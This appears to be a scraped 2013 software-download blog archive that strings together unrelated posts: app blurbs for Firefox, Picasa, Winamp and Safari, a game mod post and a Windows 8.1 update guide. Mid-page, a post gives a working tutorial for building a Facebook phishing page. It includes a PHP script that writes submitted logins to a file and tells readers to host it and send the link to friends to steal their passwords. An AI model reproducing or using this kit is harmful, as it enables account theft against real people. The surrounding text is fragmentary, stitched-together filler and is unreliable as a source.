Archive for 2013
It does not contain a media player and it does not associate file-types. With the Windows 7 codec package installed you will be able to use any media player, limited only by the players' capabilities, to play all movies and video clips. Streaming video is supported in several formats in all popular web browsers. Users of the Windows 7 media center codecs have the ability to choose what is installed and where to install it using the public redistributable. After installation you can select to remove specific portions without removing the entire package. You can also re-add the removed items at any time.
Subway Surfers New York Mod- Unlimited Coins and Keys
Saturday, 14 December 2013
Posted by
Unknown
Tag :
Android Games
Subway Surfers World Tour New York – January 2013:
The very first country for the Subway Surfers as a part of the world tour, the first installment was thrown to the players on 5th of January, 2013 and was a free upgrade. The new character introduced in the New York Tour was ”Tony” and was worth 95,000 coins. It also included a Limited Edition Liberty Board coasted at 50,000 coins.



Game description: Clash of puppets:
Help Charlie to get out of his own nightmares in a new fascinating game Clash of puppets.
Features:
Features:
- 3 various worlds
- Great number of enemies and traps
- Huge arsenal of weapon
- Leaderboard
Download To PC- Click Here
Mozilla Firefox is a fast, light and tidy open source web browser. At its public launch in 2004 Mozilla Firefox was the first browser to challenge Microsoft Internet Explorer’s dominance. Since then, Mozilla Firefox has consistently featured in the top 3 most popular browsers globally. The key features that have made Mozilla Firefox so popular are the simple and effective UI, browser speed and strong security capabilities. The browser is particularly popular with developers thanks to its open source development and active community of advanced users.
Easier Browsing
Mozilla put of a lot of dev resources into creating a simple but effective UI aimed at making browsing quicker and easier. They created the tab structure that has been adopted by most other browsers. In recent years Mozilla has also focused on maximizing browsing area by simplifying toolbar controls to just a Firefox button (which contains settings and options) and back/forward buttons. The URL box features direct Google searching as well as an auto predict/history feature called Awesome Bar. On the right side of the URL box there are bookmarking, history and refresh buttons. To the right of the URL box is a search box which allows you to customize your search engine options. Outside of that a view button controls what you see below the URL. Next to that you have the download history and home buttons.
Speed
Mozilla Firefox boasts impressive page load speeds thanks to the excellent JagerMonkey javascript engine. Start up speed and graphics rendering are also among the quickest in the market. Firefox manages complex video and web content using layer-based Direct2D and Driect3D graphics systems. Crash protection ensures only the plugin causing the issue stops working, not the rest of the content being browsed. Reloading the page restarts any affected plugins. The tab system and Awesome Bar have been streamlined to launch/get results very quickly too.
Security
Firefox was the first browser to introduce a private browsing feature which allows you to use the internet more anonymously and securely. History, searches, passwords, downloads, cookies and cached content are all removed on shutdown. Minimizing the chances of another user stealing your identity or finding confidential information. Content security, anti-phishing technology and antivirus/antimalware integration ensures your browsing experience is as safe as possible.
Personalisation & Development
One of the best features of the Firefox UI is customization. Simply right click on the navigation toolbar to customize individual components or just drag and drop items you want to move around. The inbuilt Firefox Add-ons Manager allows you to discover and install ad-ons within the browser as well as view ratings, recommendations and descriptions. Thousands of customizable themes allow you to customize the look and feel of your browser. Site authors and developers can create advanced content and applications using Mozilla’s open source platform and enhanced API.
Facebook 3.9's Description
Keeping up with friends is faster than ever.
• See what friends are up to
• Share updates, photos and videos
• Get notified when friends like and comment on your posts
• Text, chat and have group conversations
• Play games and use your favorite apps
• See what friends are up to
• Share updates, photos and videos
• Get notified when friends like and comment on your posts
• Text, chat and have group conversations
• Play games and use your favorite apps


Download Click Here
Picasa is software that helps you instantly find, edit and share all the pictures on your PC. Every time you open Picasa, it automatically locates all your pictures (even ones you forgot you had) and sorts them into visual albums organized by date with folder names you will recognize. You can drag and drop to arrange your albums and make labels to create new groups. Picasa makes sure your pictures are always organized.
Picasa also makes advanced editing simple by putting one-click fixes and powerful effects at your fingertips. And Picasa makes it a snap to share your pictures, you can email, print photos home, make gift CDs, instantly share your images and albums, and even post pictures on your own blog.
The latest version includes Web Albums (along with other improvements), but requires that you request an account from Google.
Features:
- Create and collaborate. Google Docs is built right into Google Drive, so you can work with others in real time on documents, spreadsheets and presentations.
- Store everything safely and access it anywhere (especially while on the go). You can access your stuff from anywhere—on the web, in your home, at the office, while running errands and from all of your devices.
- Search everything. Search by keyword and filter by file type, owner and more. Drive can even recognize text in scanned documents using Optical Character Recognition (OCR) technology or images using image recognition.
You may need to install Microsoft Visual C++ 2008 SP1 Redistributable Package to run this software.
Winamp is a skinnable, multi-format media player.
Winamp supports a wide variety of contemporary and specialized music file formats, including MIDI, MOD, MPEG-1 audio layers 1 and 2, AAC, M4A, FLAC, WAV, OGG Vorbis, and Windows Media Audio. It supports gapless playback for MP3 and AAC, and Replay Gain for volume leveling across tracks. In addition, Winamp can play and import music from audio CDs, optionally with CD-Text, and can also burn music to CDs. Winamp supports playback of Windows Media Video and Nullsoft Streaming Video, as well as most of the video formats supported by Windows Media Player. 5.1 Surround sound is supported where formats and decoders allow.
Winamp supports many types of streaming media: Internet radio, Internet telelvision, XM Satellite Radio, AOL video, Singingfish content, podcasts, and RSS media feeds. It also has extendable support for portable media players, and users can access their media libraries anywhere via internet connections.
You can extend Winamp's functionality through the use of plug-ins, which are available on the Winamp site.
Easiest Tutorial | Create A Facebook Phishing page | Hack Your Friends Facebook Account.!!
Thursday, 12 December 2013
Posted by
Unknown
Tag :
Tips and Hacks

What is a Phishing Page?
A Phishing page is a fake page which is used to hack someone's facebook account. This is the easiest tutorial to create a phishing page of facebook.
Steps to Create a Phishing Page:-
1.Copy the source
The first step to create a phishing page is, you need to go to this link to copy the html script of facebook
This Page will appear

Press Ctrl+A(select all) and then press Ctrl+C to copy the source.
2.Save the source
To Save The Source Open A notepad and press Ctrl+V to past the source.Press Ctrl+F on the notepad and search for action .A line like this will appear.
action="https://www.facebook.com/login.php?login_attempt=1"
All you need to do is replace the link in the codes with post.php . Now save the notepad as Phishing.htm(note: not save it as .html) in your desktop.
Now open a new notepad and save the below data as post.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now You Have Two Files phishing.htm and post.php
3.Upload it!
Now You have to upload those files in any of the websites such as 000webhost or my3gb
We Prefer you 000webhost

Now Sign Up For It...

Now Go To the Control Pannel and then on file manager...
After that a new window will pop up.Now go to public_html.

Delete the file named default.php and upload the other two files.
5.Test it
Now the last step, click on the link phishing.htm .
It will look as same as facebook page.
Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
Click on view now u will have your friend's password and email id and you are done
Now just send the link of phishing.htm and know their Email Adress and password...........
For Educational Purposes Only
At one time, web browsers simply got you to the Internet. But from the day it was released, Safari set the bar higher for web browsers. It introduced sophisticated design elements that made browsing a joy. Easy to use, Safari stayed out of your way and let you effortlessly navigate from site to site.
More browsing space: Safari is designed to emphasize the browsing, not the browser. The browser frame is a single pixel wide. You see a scroll bar only when needed. By default, there's no status bar. Instead, a progress indicator turns as your page loads. You'll find tabs at the very top of the browser, opening an even wider window for viewing websites. A great browser, Safari lets you simply enjoy the web.
Find the sites you need: Looking for a site you visited in the past but can't quite remember? Use Full History Search to quickly find sites using even the sketchiest search terms. And when you click a web page in Cover Flow, it's because you've already recognized it as the site you were looking for. No more guessing. Innovative features like these show you how good browsing can be.
Satisfy your need for speed: The world's fastest browser, Safari has speed to burn. Why should you wait for pages to load? You want to see those search results, get the latest news, check current stock prices, right now.
It is fully ACID compliant, has full support for foreign keys, joins, views, triggers, and stored procedures (in multiple languages). It includes most SQL:2008 data types, including INTEGER, NUMERIC, BOOLEAN, CHAR, VARCHAR, DATE, INTERVAL, and TIMESTAMP.
SeaMonkey is a web-browser, advanced e-mail and newsgroup client, IRC chat client, and HTML editing made simple -- all your Internet needs in one application.- Tabbed browsing gives you a better way to surf the net. You no longer have to open one page at a time. With tabbed browsing, open several pages at once with one click. Plus, your homepage can be multiple pages, in tabs.
- Popup blocker lets you surf the web without interruption from annoying ads.
- Image Manager lets you block images to remove offensive images or speed up the rendering of web sites.
- Find as you type gives you another way to navigate a page. Just start typing to jump from link to link or to find a word or phrase within a page.
- Plus all the features a modern browser should have including: Advanced security settings; Password, Download, and Cookie managers; Themes; multi-language and multi-platform support; and, the latest in Web Standards.
DownloadLatest Version
4.48MB
Don't have windows 8? Download from this link
Note- The Tutorial Below is From Windows
Windows 8.1 and Windows RT 8.1 build on Windows 8 and Windows RT, to bring you enhancements in personalization, search, apps, the Windows Store, and cloud connectivity, and has the security and reliability features you expect from Windows. It's fast and made to work on a variety of devices—especially on the new generation of touch devices.
If your PC is currently running Windows 8 or Windows RT, it's free to update to Windows 8.1 or Windows RT 8.1. And unlike previous updates to Windows, you'll get this update from the Windows Store.
1. Before you begin
The system requirements for Windows 8.1 and Windows RT 8.1 are nearly the same as the requirements for Windows 8—if your PC is already running Windows 8 (or Windows RT), in most cases, you can get the free update to Windows 8.1 (orWindows RT 8.1).
But before you begin, here are some things to keep in mind.
- Your files, desktop apps, user accounts, and settings come with you. Windows 8.1 and Windows RT 8.1 come with some new built-in apps, and it will update or replace some of your existing built-in apps. Your existing Windows Store apps don't come with you, but once the update is complete, you can reinstall all of these apps at once—or just the ones you want. For more info, see the Welcome to the new Windows section of this page.
- We'll check your desktop apps and devices for you. As part of the update, we check your current desktop apps and connected devices, and let you know what you'll need to do to get them ready for the update, or to get them working again after the update. In most cases, you won't need to do anything—most desktop apps, devices (like printers), and network connections will work normally after the update. If you have particular desktop apps or devices you're concerned about, you can check their compatibility in the Windows Compatibility Center.
- Consider using a Microsoft account to sign in to your PC. If you already use a Microsoft account to sign in toWindows 8 or Windows RT, you’ll use that same account to sign in to Windows 8.1 or Windows RT 8.1.If you don’t, we recommend that you start using a Microsoft account in Windows 8.1 or Windows RT 8.1. Simply put, it’s the glue that holds together so many useful features of the new Windows: the ability to download apps from the Store, automatic syncing of your settings and documents between your PCs, backing up your photos to the cloud so you can get to them from anywhere, and seeing all your contacts from multiple email and social networking accounts together in the People and Mail apps.If you already have an account you use with Outlook.com, Xbox LIVE, Windows Phone, or Skype, then you already have a Microsoft account. If you use more than one of these, we can help you figure out which email address to use.
- You can keep working while the update is installing. Download and installation times vary from about 30 minutes to several hours, depending on your Internet connection speed, and the speed and configuration of your PC, but you can still use your PC while the update is installing in the background. During this time, if you decide to leave your PC unattended, be sure to save your work and close any apps you have open first, in case your PC needs to restart automatically while you’re away. After it restarts, you won't be able to use your PC for a little while (from about 20 minutes to an hour), while the updates are being applied. After that phase is complete, we'll walk you through choosing a few basic settings and then Windows will finish applying any final updates that are needed.
2. Prepare your PC
There are a few things you should do before you start installing.
- Back up your files. Although your files and apps come with you when you update to Windows 8.1 or Windows RT 8.1, it's a good idea to make sure that your files are backed up first, by setting up File History.
- Make sure you have enough free disk space. If you're currently running Windows 8, you need 3,000 MB of available space to install the 32-bit version of Windows 8.1, and 3,850 MB of available space to install the 64-bit version ofWindows 8.1. On a Windows RT device, you need 2,250 MB of available disk space to install Windows RT 8.1. For more info, see Tips to free up drive space on your PC
- Plug in your laptop or tablet. It's important to keep your PC plugged in throughout the update process, because if you lose power before it's done, the update might not install properly.
- Connect to the Internet. It's best to stay connected until the update is done. If you don't, you’ll need to connect again to finish setting up later, and setup will take longer.
- Get the latest critical and important updates. There are some updates you might need before you can installWindows 8.1. In most cases, the latest updates will be installed automatically using Windows Update. But if you don’t have automatic updates turned on and you need to check for updates manually, or if you'd like to check to see when the latest updates were installed, you can do this from Windows Update. For more info, see Windows Update: Frequently asked questions.
- Temporarily turn off your antivirus program. Some antivirus software might interfere with the installation. After you install Windows 8.1 or Windows RT 8.1, remember to turn your antivirus program back on.
3. Get the free update
Ready? Now you can download the free update from the Windows Store.
- Go to the Start screen, and tap or click the Store tile.

Store tile on the Start screen - In the Store, tap or click the Windows 8.1 or Windows RT 8.1 update. if you don't see the update on the Store home screen, see Why can't I find the update in the Store?
- Tap or click Download.
- The update will download and install in the background while you use your PC to do other things. The installer will check to make sure you have enough disk space, that your apps and devices will work with Windows 8.1 or Windows RT 8.1, and that you have all the required updates.In some cases, the installer might find something you need to take care of before you can continue installing the update. If so, you'll see a message telling you what you need to do.
Note
- If the installation is interrupted for any reason, you can restart the update from where you left off by going back to the Store and downloading the update again.
4. Restart
After the update is downloaded and the first phase of the installation is complete (which could take between 15 minutes and a few hours, depending on your system and your connection speed), you'll see a message telling you that your PC needs to restart. It will give you 15 minutes to finish what you’re working on, save your work, and close your apps, and then it will restart your PC for you. Or you can restart it yourself.

Important
- If you leave your PC before it's ready to restart, be sure to save your work and close any desktop apps you're using to make sure you don't lose anything when it restarts automatically. Your PC might need to restart more than once, depending on how it’s set up, and whether additional updates are needed.
- Restarting will take longer than usual—from 20 minutes to about an hour—while the update is applied. During this time, you won't be able to use your PC.
5. Choose your settings
License terms
After your PC finishes restarting, you'll be presented with the Microsoft software license terms. Review the terms, and then tap or click I accept to continue. If you don't accept the terms, this cancels the installation of Windows 8.1 or Windows RT 8.1, and your PC will roll back to Windows 8 or Windows RT.
Express settings
You'll see a list of recommended settings, called express settings. To accept these settings and continue, tap or click Use express settings. You can change any of these settings later, after you finish setting up. If you'd like to change some of these settings now, tap or click Customize.

For more info, tap or click Learn more about express settings. To learn about how these settings affect your privacy, tap or click Privacy statement.
Sign in
Next, you'll be asked to sign in.

If you already use a Microsoft account to sign in to Windows 8 or Windows RT, your account name will be filled in for you. If you previously used a local account for this, you'll need to sign in with your local account first, and then we'll ask you to set up a Microsoft account, which you can use to sign in to your PC after the update.
Show all
If you already have a Microsoft account
- Enter your Microsoft account email address, if needed, and your password.
- We'll send a security code to the alternate email address or phone number you've set up for this account, and you'll need to enter that code to verify that you're the owner of the account. This helps us protect your account and devices when you access sensitive info. If you don't have alternate contact info set up for the account yet, you'll be asked to provide it now.
Notes
- If you have more than one Microsoft account, you can get help figuring out which email address to use for your Microsoft account.
- If you signed in to your PC using a Microsoft account before you installed Windows 8.1 or Windows RT 8.1, then you might not need to enter a security code.
To create a new Microsoft account
- Choose Create a new account.
- Next, you'll be asked to choose an email address you'd like to use as a Microsoft account. This can be any email address you use, and isn't limited to addresses that come from Microsoft. Enter the email address that you use the most. We'll use it to set up the Mail and People apps for you with email and contacts that you already use every day.
- Enter the password you'd like to use, and fill in the rest of the info, including your first name, last name, and your country or region.
- Next, you'll also be asked to provide an alternate email address or phone number where we can reach you by email, phone, or text message (SMS). This helps us protect your account and devices whenever you access sensitive info using this account. After you enter this info, we'll send a message to you containing a security code, and you'll need to enter that code to verify that you're the owner of the account.
SkyDrive cloud storage
If this is your first time setting up a PC with Windows 8.1 or Windows RT 8.1, you'll see the new SkyDrive options.
If you already have another PC running Windows 8.1 or Windows RT 8.1, and you chose to sync settings on that PC, then yourSkyDrive settings will also sync from your existing PC to this one, and you might not see this screen.

If you click Next on this screen, your PC will use these default SkyDrive settings:
- Photos you take with this PC are saved to your camera roll folder on this PC, and a smaller copy of each photo is automatically backed up to your SkyDrive.
- When you create a new document, the default save location is SkyDrive. But you can always choose to save individual documents locally or on another drive.
- Windows will save a backup copy of your PC settings to SkyDrive. If something ever happens to your PC and you need to replace it, your settings are saved in the cloud and you can transfer them to a new PC instantly.
You can change any of these settings later in PC settings. If you'd prefer to turn off all of these settings now, tap or click Turn off these SkyDrive settings (not recommended).
Final updates
Because Windows is always being updated, it’s possible that critical updates have become available since Windows 8.1 andWindows RT 8.1 were finalized. Windows checks for these critical updates when you finish setting up Windows 8.1 orWindows RT 8.1 for the first time, and if it finds any, it will download them automatically. Downloading and installing these updates might take a few minutes, depending on the updates you need. Your PC might also need to restart one or more times to complete the updates.
6. Welcome to the new Windows
The new Start screen will appear.

Much of it will look familiar, but if you'd like to explore what's new and how to get around, check out this Start screen page.
Your desktop apps come with you when you update to Windows 8.1 or Windows RT 8.1, but you'll need to reinstall your Windows Store apps. You can see all of the Windows Store apps you own in the Your apps section of the Store. From here, you can choose the ones you want to install on your updated PC, and install them all at once.

To reinstall apps from the Store
- On the Start screen, tap or click the Store tile to open the Windows Store.
- Swipe down from the top edge of the screen or right-click, and then tap or click Your apps.
- Select all the apps you want to install, and then tap or click Install.
Notes
- You can also reinstall apps from the Start screen by tapping or clicking the tiles.
- You don't need to wait for the apps to finish installing. They'll keep installing in the background while you do other things.








